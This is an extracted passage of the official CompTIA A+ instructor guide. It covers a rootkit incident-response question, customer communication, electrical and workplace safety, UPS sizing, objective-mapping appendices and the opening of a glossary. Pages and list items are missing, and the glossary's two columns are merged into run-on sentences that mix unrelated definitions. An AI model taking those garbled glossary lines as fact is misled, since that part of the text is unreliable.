LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
696 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
5. The contract ended recently for several workers who were hired
for a specific project. The IT department has not yet removed those
employees’ login accounts. It appears that one of the accounts has been
used to access the network, and a rootkit was installed on a server. You
immediately contact the agency the employee was hired through and
learn that the employee is out of the country, so it is unlikely that this
person caused the problem. What actions do you need to take?
You need to create an incident report, remove or disable the login accounts, isolate
the infected server and possibly any user computers that communicate with the
server, and remove the rootkit from the server. In terms of wider security policies,
investigate why the temporary accounts were not disabled on completion of the
project.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 697
Topic 20B
Use Proper Communication
Techniques
6
Proper Documentation
Support contact information and hours of operation should be well advertised so
that the customer knows exactly how to open a ticket. The service should have
proper documentation so that the customer knows what to expect in terms of items
that are supported, how long incidents may take to resolve, when they can expect
an item to be replaced instead of repaired, and so on.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
698 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Replace—Give the customer clear instructions for how the product will be
delivered or how it can be re-ordered and whether the broken product must be
returned.
Follow Up
If you have resolved the ticket and tested that the system is operating normally
again, you should give the customer a general indication of what caused the issue
and what you did to fix it along with assurance that the problem is now fixed and
unlikely to reoccur. Upon leaving or ending the call, thank the customer for their
time and assistance and show that you have appreciated the chance to solve
the issue.
It might be appropriate to arrange a follow-up call at a later date to verify that the
issue has not reoccurred and that the customer is satisfied with the assistance
provided. When the solution has been tested and verified and the customer has
expressed satisfaction with the resolution of the problem, log the ticket as closed.
Record the solution and send verification to the customer via email or phone call.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 699
Ensure that you are on time for each in-person appointment or contact call. If it
becomes obvious that you are not going to be on time, inform the customer as
soon as possible. Be accountable for your actions, both before you arrive on site
and while on site. This means being honest and direct about delays, but make sure
this is done in a positive manner. For example:
“I’m sorry I’m late—show me this faulty PC, and
I’ll start work right away.”
“The printer needs a new fuser—and I’m afraid
that I don’t have this type with me. What I will
do is call the office and find out how quickly we
can get one...”
“I haven’t seen this problem before, but I have
taken some notes, and I’ll check this out as soon
as I get back to the office. I’ll give you a call
this afternoon—will that be OK?”
Avoid Distractions
A distraction is anything that interrupts you from the task of resolving the ticket.
Other than a genuinely critical incident taking priority, do not allow interruptions
when you are working at a customer’s site. Do not take calls from colleagues unless
they are work-related and urgent. Other than a genuine family emergency, do not
take personal calls or texts. Do not browse websites, play games, or respond to
posts on social media.
If you are speaking with a customer on the telephone, always ask their permission
before putting the call on hold or transferring the call.
• Do not use any equipment or services such as PCs, printers, web access, or
phones for any purpose other than resolving the ticket.
• If you are making a site visit, keep the area in which you are working clean and
tidy and leave it as you found it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
700 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Professional Appearance
Show There are many things that contribute to the art of presentation. Your appearance
Slide(s) and attire, the words you use, and respecting cultural sensitivities are particularly
Professional important.
Appearance
Professional Appearance and Attire
When you visit a customer site, you must represent the professionalism of your
company in the way you are dressed and groomed. If you do not have a company
uniform, you must wear clothes that are suitable for the given environment or
circumstance:
• Formal attire means matching suit clothes in sober colors and with minimal
accessories or jewelry. Business formal is only usually required for initial client
meetings.
• Business casual means smart clothes. Notably, jeans, shorts and short skirts, and
T-shirts/vests are not smart workwear. Business casual is typically sufficient for
troubleshooting appointments.
Business casual can mean a wide range of smart clothes. (Image by goodluz © 123RF.com.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 701
Cultural Sensitivity
Cultural sensitivity means being aware of customs and habits used by other people.
It is easy to associate culture simply with national elements, such as the difference
between the way Americans and Japanese greet one another. However, within each
nation there are many different cultures created by things such as social class,
business opportunities, leisure pursuits, and so on. For example, a person may
expect to be addressed by a professional title, such as “doctor” or “judge.” Other
people may be more comfortable speaking on a first-name basis. It is safer to start
on a formal basis and use more informal terms of address if the customer signals
that happier speaking that way.
You need to realize that though people may be influenced by several cultures,
their behavior is not determined by culture. Customer service and support require
consideration for other people. You cannot show this if you make stereotyped
assumptions about people’s cultural background without treating them as an individual.
Accent, dialect, and language are some of the crucial elements of cultural sensitivity.
These can make it hard for you to understand a customer and perhaps difficult for a
customer to understand you. When dealing with a language barrier, use questions,
summaries, and restatements to clarify customer statements. Consider using visual
aids or demonstrations rather than trying to explain something in words.
Also, different cultures define personal space differently, so be aware of how close
or far you are from the customer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
702 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Professional Communications
Show You must listen carefully to what is being said to you; it will give you clues to the
Slide(s) customer’s technical level, enabling you to pace and adapt your replies accordingly.
Professional
Communications Active Listening
Active listening is the skill of listening to an individual so that you give that person
your full attention and are not trying to argue with, comment on, or misinterpret
what they have said. With active listening, you make a conscious effort to keep
your attention focused on what the other person is saying, as opposed to being
distracted by thinking what your reply is going to be or by some background noise
or interruption. Some of the other techniques of active listening are to reflect
phrases used by the other person or to restate the issue and summarize what they
have said. This helps to reassure the other person that you have attended to what
has been said. You should also try to take notes of what the customer says so that
you have an accurate record.
Listening carefully will help you to get the most information from what a customer tells you.
(Image by goodluz © 123RF.com.)
• Closed—A question that can only be answered with a “Yes” or “No” or that
requires some other fixed response. For example, “What error number is
displayed on the panel?” can only have one answer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 703
The basic technique is start with open-ended questions. You may try to guide the
customer toward information that is most helpful. For example, “When you say
your printer is not working, what problem are you having—will it not switch on?”
However, be careful about assuming what the problem is and leading the customer
to simply affirming a guess. As the customer explains what they, you may be able to
perceive what the problem is. If so, do not assume anything too early. Ask pertinent
closed questions that clarify customer statements and prove or disprove your
perception. The customer may give you information that is vague or ambiguous.
Clarify the customer’s meaning by asking questions like, “What did the error
message say?” or “When you say the printout is dark, is there a faint image or is it
completely black?” or “Is the power LED on the printer lit?”
If a customer is not getting to the point or if you want to follow some specific steps,
take charge of the conversation by restating the issue and asking closed questions.
For example, consider this interaction:
“It’s been like this for ages now, and I’ve tried
pressing a key and moving the mouse, but nothing
happens.”
“What does the screen look like?”
“It’s dark. I thought the computer was just
resting, and I know in that circumstance I need
to press a key, but that’s not working and I
really need to get on with...”
In this example, the technician asks an open question that prompts the user to say
what they perceive to be the problem instead of relaying valuable troubleshooting
information to the technician. Compare with the following scenario:
“It’s been like this for ages now, and I’ve tried
pressing a key and moving the mouse, but nothing
happens.”
“OK, pressing a key should activate the monitor,
but since that isn’t happening, I’d like to
investigate something else first. Can you tell me
whether the light on the monitor is green?”
“I don’t see a green light. There’s a yellow
light though.”
Restating the issue and using a closed question allows the agent to start working
through a series of symptoms to try to diagnose the problem.
Do note that a long sequence of closed questions fired off rapidly may overwhelm
and confuse a customer. Do not try to force the pace. Establish the customer’s
technical level, and target the conversation accordingly.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
704 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Difficult Situations
Show A difficult situation occurs when either you or the customer becomes or risks
Slide(s) becoming angry or upset. There are several techniques that you can use to defuse
Difficult Situations this type of tension.
It is better to think of the situation as difficult and to avoid characterizing the customer
as difficult. Do not personalize support issues.
• Being judgmental—Do not assume that the customer lacks knowledge about
the system and is therefore causing the problem.
3. Let the customer explain the problem while you actively listen—Draw
out the facts, and use them as a positive action plan to drive the support case
forward.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 705
4. Hang up—Be guided by whatever policy your organization has in place, but in
general terms, if a customer is abusive or threatening, issue a caution to warn
them about this behavior. If the abuse continues, end the call or escalate it to
a manager. Make sure you explain and document your reasons.
Identify early signs that a customer is becoming angry. (Image by Wang Tom © 123RF.com.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
706 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Proper Communication Techniques
7
Teaching 1. When you arrive at a customer location to service a network printer, the
Tip user is upset because the printer is not working and therefore he cannot
Take some time at submit his reports on time. How should you approach this user?
the end of each topic
to answer questions. Demonstrate empathy with the customer’s situation, use active listening skills to
You can use the show that you understand the importance of the issue, and make the customer
review questions confident that you can help. Then use closed-questioning techniques to start to
for discussion in
class or set them for
diagnose the problem.
students to complete
individually during or 2. You are trying to troubleshoot a problem over the phone and need to
after class. get advice from your manager. How should you handle this with the
customer?
Advise the customer that you will put him or her on hold while you speak to
someone else, or arrange to call the customer back.
Run through the print process step-by-step to show that it works. It is very
important to get a customer’s acceptance that a problem is closed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 707
Topic 20C
Use Common Safety and
Environmental Procedures
5
• Building codes—Ensuring that fire prevention and electrical systems are intact
and safe.
For example, in the United States, the most common safety regulations are those
issued by the federal government, such as the Occupational Safety and Health
Administration (OSHA), and state standards regarding employee safety.
While specific regulations may vary from country to country and state to state,
in general, employers are responsible for providing a safe and healthy working
environment for their employees. Employees have a responsibility to use
equipment in the workplace in accordance with the guidelines given to them and to
report any hazards. Employees should also not interfere with any safety systems,
including signs or warnings or devices such as firefighting equipment. Employees
should not introduce or install devices, equipment, or materials to the workplace
without authorization or without assessing the installation.
Electrical Safety
Electricity flows in a circuit. A circuit is made when conductors form a continuous Show
path between the positive and negative terminals of a power source. An electrical Slide(s)
circuit has the following properties: Electrical Safety
• Current is the amount of charge flowing through a conductor, measured in amps
(A or I).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
708 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Voltage is the potential difference between two points (often likened to pressure
in a water pipe) measured in volts (V).
Fuses
An electrical device must be fitted with a fuse appropriate to its maximum current,
such as 3A, 5A, or 13A. A fuse blows if there is a problem with the electrical supply,
breaking the circuit to the power source. If the fuse fitted is rated too low, it will
blow too easily; if the rating is too high, it may not blow when it should and will
allow too much current to pass through the device.
Take care with strip sockets. The total amperage of devices connected to the strip must
not exceed the strip's maximum load (typically 13 amps).
Equipment Grounding
Electrical equipment must be grounded. If there is a fault that causes metal parts
in the equipment to become live, a ground provides a path of least resistance for
the electrical current to flow away harmlessly. Devices such as PCs and printers
are connected to the building ground via the power plug. However, the large metal
equipment racks often used to house servers and network equipment must also be
grounded. Do not disconnect the ground wire. If it must be removed, make sure it is
replaced by a professional electrician.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 709
Electrical currents can pass through metal and most liquids, so neither should be
allowed to come into contact with any electrical device installations. Damaged
components or cables are also a risk and should be replaced or isolated immediately.
It is important to test electrical devices regularly. The frequency will depend on the
environment in which the device is used. In some countries, portable appliance testing
(PAT) carried out by a qualified electrician or technician ensures that a device is safe
to use.
Never insert anything into the power supply fan to get it to rotate. This approach does
not work, and it is dangerous.
A trip hazard is caused by putting any object in pathways where people walk.
• When installing equipment, ensure that cabling is secured, using cable ties or
cable management products if necessary. Check that cables running under a
desk cannot be kicked out by a user’s feet. Do not run cabling across walkways,
but if there is no option but to do so, use a cord protector to cover the cabling.
• When servicing equipment, do not leave devices (PC cases, for instance) in
walkways or near the edge of a desk (where they could be knocked off). Be
careful about putting down heavy or bulky equipment (ensure that it cannot
topple).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
710 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lifting Techniques
Lifting a heavy object in the wrong way can damage your back or cause muscle
strains and ligament damage. You may also drop the object and injure yourself or
damage the object. When you need to lift or carry items, be aware of the maximum
safe lifting weight as well as any restrictions and guidance set out in your job
description or site safety handbook. To lift a heavy object safely:
1. Plant your feet around the object with one foot slightly toward the direction in
which you are going to move.
2. Bend your knees to reach the object while keeping your back as straight and
comfortable as possible and your chin up.
3. Find a firm grip on the object, and then lift smoothly by straightening your
legs—do not jerk the object up.
5. To lower an object, reverse the lifting process; keep your chin up and bend at
the knees. Take care not to trap your fingers or to lower the object onto your
feet.
If you cannot lift an object because it is too awkward or heavy, then get help from
a coworker or use a cart to relocate the equipment. If you use a cart, make sure
the equipment is tightly secured during transport. Do not stack loose items on a
cart. If you need to carry an object for some distance, make sure that the route is
unobstructed and that the pathway (including stairs or doorways) is wide and tall
enough.
• When you are using a compressed air canister, working around toner spills, or
working in a dusty environment, use an air-filter mask that fits over your mouth
and nose. People who suffer from asthma or bronchitis should avoid changing
toner cartridges where possible.
Environmental Impacts
Show The location in which computer equipment is placed can affect its proper operation
Slide(s) and lifespan. All electronic equipment should be kept away from extremes of
Environmental temperature and damp or dusty conditions.
Impacts
Dust Cleanup
Dust is drawn into the computer via ventilation holes. Over time, the dust can form a
thick layer over components, heat sinks, fan blades, and ventilation slots, preventing
effective heat dissipation. It can clog up peripherals such as keyboards and mice. Dust
and smears can make the display hard to read. To perform dust cleanup:
• Use a compressed air blaster to dislodge dust from difficult-to-reach areas. Take
care with use, however, as you risk contaminating the environment with dust.
Ideally, perform this sort of maintenance within a controlled work area, and wear
an appropriate air-filter mask and goggles.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 711
Do not use compressed air blasters to clean up a toner spill or a laser printer within an
office-type area. You will blow fine toner dust into the atmosphere and create a health
hazard.
• Use a PC vacuum cleaner or natural bristle brush to remove dust from inside
the system unit, especially from the motherboard, adapter cards, and fan
assemblies. Domestic vacuum appliances should not be used as they can
produce high levels of static electricity. PC-safe vacuums can often be used to
blow air as well as for suction, so they can replace the need for compressed air
canisters.
A PC vacuum can be used to deal with toner spills only if the filter and bag are fine
enough to contain toner particles. Such vacuums should be labelled as toner-safe.
Ideally, move the printer to a maintenance room with filters to contain airborne
particles. Alternatively, a toner cloth is a special cloth for wiping up loose toner. Be
careful if you are using it inside the printer so that the cloth does not get caught on any
components and leave fibers behind.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
712 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
For your safety, unplug the computer from building power before opening the chassis.
• Wear an anti-ESD wrist strap or leg strap to dissipate static charges more
effectively. The band should fit snugly around your wrist or ankle so that the
metal stud makes contact with your skin. Do not wear it over clothing. The strap
ground is made either using a grounding plug that plugs into a wall socket or
a crocodile clip that attaches to a grounded point or an unpainted part of the
computer’s metal chassis.
Electrostatic Discharge (ESD) wrist strap on ESD mat. (Image by Audrius Merfeldas ©123RF.com.)
Ensure that the strap has a working current-limiting resistor for safety (straps should
be tested daily). Do not use a grounding plug if there is any suspicion of a fault in the
socket or in the building's electrical wiring or if the wiring is not regularly inspected and
tested.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 713
• Surges—A surge is a brief increase in voltage, while a spike is an intense surge. Building Power Issues
and Mitigations
A surge or spike can be caused by machinery and other high-power devices
being turned on or off and by lightning strikes. This type of event can take the
supply voltage well over its normal value and cause sufficient interference to a
computer to crash it, reboot it, or even damage it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
714 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Power failure—A power failure is complete loss of power. This will cause a
computer to power off suddenly. A blackout may be caused by a disruption to
the power distribution grid—an equipment failure or the accidental cutting of a
cable during construction work, for example—or may simply happen because a
fuse has blown or a circuit breaker has tripped.
A range of power protection devices is available to mitigate the faults these power
events can cause in computer equipment.
Surge Suppressors
Passive protection devices can be used to filter out the effects of surges and spikes.
The simplest surge suppressor devices come in the form of adapters, trailing
sockets, or filter plugs, with the protection circuitry built into the unit. These devices
offer low-cost protection to one or two pieces of equipment. Surge protectors
are rated according to various national and international standards, including
Underwriters Laboratory (UL) 1449. There are three important characteristics:
• Clamping voltage—Defines the level at which the protection circuitry will
activate, with lower voltages (400 V or 300 V) offering better protection.
• Joules rating—The amount of energy the surge protector can absorb, with
600 joules or more offering better protection. Each surge event will degrade
the capability of the suppressor.
Battery Backups
Sudden power loss is likely to cause file corruption. If there is loss of power due to
a brownout or blackout, system operation can be sustained for a few minutes by
using battery backup. Battery backup can be provisioned at the component level
for disk drives, RAID arrays, and memory modules. The battery protects any read or
write operations cached at the time of power loss.
At the system level, an uninterruptible power supply (UPS) will provide a
temporary power source in the event of complete power loss. The time allowed
by a UPS is sufficient to activate an alternative power source, such as a standby
generator. If there is no alternative power source, a UPS will at least allow you to
save files and shut down the server or appliance properly.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 715
The key characteristics of a UPS are volt-amperes (VA) rating and runtime:
• VA rating is the maximum load the UPS can sustain. To work out the minimum
VA, sum the wattage of all the devices that will be attached to the UPS and
multiply by 1.67 to account for a conversion factor. For example, if you have a
10 W home router and two 250 W computers, the VA is (10 + 250 + 250) *
1.67 = 852 VA. A 1K VA UPS model should therefore be sufficient.
• Runtime is the number of minutes that the batteries will supply power. The
strength of the UPS batteries is measured in amp hours (Ah).
Vendors provide calculators to help select an appropriate UPS size for the required
load and runtime.
Employers are obliged to assess the risk to their workforce from hazardous
substances at work and to take steps to eliminate or control that risk. No work with
hazardous substances should take place unless an assessment has been made.
Employees are within their rights to refuse to work with hazardous substances that
have not been assessed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
716 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Suppliers of chemicals are required to identify the hazards associated with the
substances they supply. Some hazard information will be provided on labels, but
the supplier must also provide more detailed information on a material safety
data sheet (MSDS). An MSDS will contain information about ingredients, health
hazards, precautions, and first aid information and what to do if the material is
spilled or leaks. The MSDS should also include information about how to recycle any
waste product or dispose of it safely.
You may need to refer to an MSDS in the course of handling monitors, power
supplies, batteries, laser-printer toner, and cleaning products. If handling devices
that are broken or leaking, use appropriate protective gear, such as gloves, safety
goggles, and an air-filter mask.
Proper Disposal
Even with procedures in place to properly maintain IT equipment, eventually it
will need to be decommissioned and either disposed of or recycled. IT equipment
contains numerous components and materials that can cause environmental
damage if they are disposed of as ordinary refuse. Waste disposal regulations
to ensure protection of the environment are enforced by the federal and local
governments in the United States and many other nations. Computer equipment is
typically classed as waste electrical and electronic equipment (WEEE).
Special care must be taken in respect of the following device types:
• Battery disposal—Swollen or leaking batteries from laptop computers or
within cell phones and tablets must be handled very carefully and stored within
appropriate containers. Use gloves and safety goggles to minimize any risk
of burns from corrosive material. Batteries must be disposed of through an
approved waste management and recycling facility.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 717
Review Activity:
Safety and Environmental Procedures
6
The main concern is damaging your back. Lift slowly and use your legs for power,
not your back muscles.
This is a circuit designed to protect connected devices from the effect of sudden
increases or spikes in the supply voltage and/or current. Surge protectors are rated
by clamping voltage (low values are better), joules rating (higher values are better),
and amperage (the maximum current that can be carried).
Heat and direct sunlight, excessive dust and liquids, and very low or high humidity.
Equipment should also be installed so as not to pose a topple or trip hazard.
A material safety data sheet (MSDS) should be read when introducing a new
product or substance to the workplace. Subsequently, you should consult it if
there is an accident involving the substance and when you need to dispose of
the substance.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
718 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 20
Show
Slide(s)
Summary
Summary
7
• Develop an inventory database to assign asset IDs and manage procurement life
cycle, including warranty and licensing and assigned users.
• Create best practice SOPs and provision tools to ensure personal safety
(equipment grounding, disconnect power before repairing PC, lifting techniques,
electrical fire safety, safety goggles, gloves, and air-filtration masks).
• Create best practice SOPs and provision environmental controls to ensure device
integrity and compliance with regulations (MSDS documentation for handling
and disposal of batteries, toner, and electronic waste; temperature, humidity-
level awareness, and proper ventilation; dust cleanup with compressed air/
vacuums and battery backup/surge suppressors to mitigate power surges,
brownouts, and blackouts).
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A
Mapping Course Content
to CompTIA® A+® Core 1
(Exam 220-1101)
1
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-2 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-3
2.0 Networking
2.1 Compare and contrast Transmission Control
Protocol (TCP) and User Datagram Protocol (UDP)
ports, protocols, and their purposes. Covered in
Ports and protocols Lesson 5, Topic C
20/21 - File Transfer Protocol (FTP)
22 - Secure Shell (SSH)
23 - Telnet
25 - Simple Mail Transfer Protocol (SMTP)
53 - Domain Name System (DNS)
67/68 - Dynamic Host Configuration Protocol (DHCP)
80 - Hypertext Transfer Protocol (HTTP)
110 - Post Office Protocol 3 (POP3)
137/139 - Network Basic Input/Output System (NetBIOS)/
NetBIOS over TCP/IP (NetBT)
143 - Internet Mail Access Protocol (IMAP)
161/162 - Simple Network Management Protocol (SNMP)
389 - Lightweight Directory Access Protocol (LDAP)
443 - Hypertext Transfer Protocol Secure (HTTPS)
445 - Server Message Block (SMB)/Common Internet File
System (CIFS)
3389 - Remote Desktop Protocol (RDP)
TCP vs. UDP Lesson 5, Topic C
Connectionless
DHCP
Trivial File Transfer Protocol (TFTP)
Connection-oriented
HTTPS
SSH
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-4 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-5
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-6 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-7
3.0 Hardware
3.1 Explain basic cable types and their connectors,
features, and purposes. Covered in
Network cables Lesson 4, Topic C
Copper
Cat 5
Cat 5e
Cat 6
Cat 6a
Coaxial
Shielded twisted pair
Direct burial
Unshielded twisted pair
Plenum
Optical
Fiber
T568A/T568B
Peripheral cables Lesson 1, Topic C
USB 2.0
USB 3.0
Serial
Thunderbolt
Video cables Lesson 1, Topic C
High-Definition Multimedia Interface (HDMI)
DisplayPort
Digital Visual Interface (DVI)
Video Graphics Array (VGA)
Hard drive cables Lesson 1, Topic C
Serial Advanced Technology Attachment (SATA)
Small Computer System Interface (SCSI)
External SATA (eSATA)
Integrated Drive Electronics (IDE)
Adapters Lesson 1, Topic A
Connector types Lesson 1, Topic A
RJ11
RJ45
F type
Straight tip (ST)
Subscriber connector (SC)
Lucent connector (LC)
Punchdown block
microUSB
miniUSB
USB-C
Molex
Lightning port
DB9
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-8 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-9
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-10 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-11
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-12 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-13
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
A-14 | Appendix A
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix A | A-15
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B
Mapping Course Content to
CompTIA® A+® Core 2
(Exam 220-1102)
1
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-2 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-3
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-4 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-5
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-6 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-7
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-8 | Appendix B
2.0 Security
2.1 Summarize various security measures and
their purposes. Covered in
Physical security Lesson 16, Topic D
Access control vestibule
Badge reader
Video surveillance
Alarm systems
Motion sensors
Door locks
Equipment locks
Guards
Bollards
Fences
Physical security for staff Lesson 16, Topic D
Key fobs
Smart cards
Keys
Biometrics
Retina scanner
Fingerprint scanner
Palmprint scanner
Lighting
Magnetometers
Logical security Lesson 14, Topic C
Principle of least privilege
Access control lists (ACLs)
Multifactor authentication (MFA)
Email
Hard token
Soft token
Short message service (SMS)
Voice call
Authenticator application
Mobile device management (MDM) Lesson 14, Topic C
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-9
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-10 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-11
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-12 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-13
2.10 G
iven a scenario, install and configure browsers
and relevant security settings. Covered in
Browser download/installation Lesson 17, Topic B
Trusted sources
Hashing
Untrusted sources
Extensions and plug-ins Lesson 17, Topic B
Trusted sources
Untrusted sources
Password managers Lesson 17, Topic B
Secure connections/sites - valid certificates Lesson 17, Topic B
Settings Lesson 17, Topic B
Pop-up blocker
Clearing browsing data
Clearing cache
Private-browsing mode
Sign-in/browser data synchronization
Ad blockers
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-14 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-15
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-16 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-17
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-18 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Appendix B | B-19
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
B-20 | Appendix B
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary
Core 1 Ryzen have been very popular with
computer manufacturers and have often
32-bit versus 64-bit Processing modes out-performed their Intel equivalents.
referring to the size of each instruction
Advanced RISC Machines (ARM)
processed by the CPU. 32-bit CPUs
Designer of CPU and chipset
replaced earlier 16-bit CPUs and were
architectures widely used in mobile
used through the 1990s to the present
devices. RISC stands for reduced
day, though most PC and laptop CPUs
instruction set computing. RISC
now work in 64-bit mode. The main 64-
microarchitectures use a small number
bit platform is called AMD64 or EM64T
of simple instructions that can be
(by Intel). Software can be compiled as
performed as a single operation.
32-bit or 64-bit. 64-bit CPUs can run
This contrasts with complex (CISC)
most 32-bit software, but a 32-bit CPU
microarchitectures, which use a large
cannot execute 64-bit software.
set of more powerful instructions that
3-D Printer Hardware device capable can take more than one operation to
of small-scale manufacturing. Most 3-D complete.
printers use either a variety of filament
advanced technology extended (ATX)
(typically plastic) or resin media with
Standard PC case, motherboard, and
different properties.
power supply specification. Mini-, Micro-,
802.11 standards Specifications and Flex-ATX specify smaller board
developed by IEEE for wireless designs.
networking over microwave radio
airplane mode A toggle found on
transmission in the 2.4 GHz, 5 GHz,
mobile devices enabling the user to
and 6 GHz frequency bands. The Wi-Fi
disable and enable wireless functionality
standards brand has six main iterations:
quickly.
a, b, g, Wi-Fi 4 (n), Wi-Fi 5 (ac), and Wi-Fi 6
(ax). These specify different modulation app store Feature of mobile computing
techniques, supported distances, and that provides a managed interface for
data rates, plus special features, such as installing third-party software apps.
channel bonding, MIMO, and MU-MIMO.
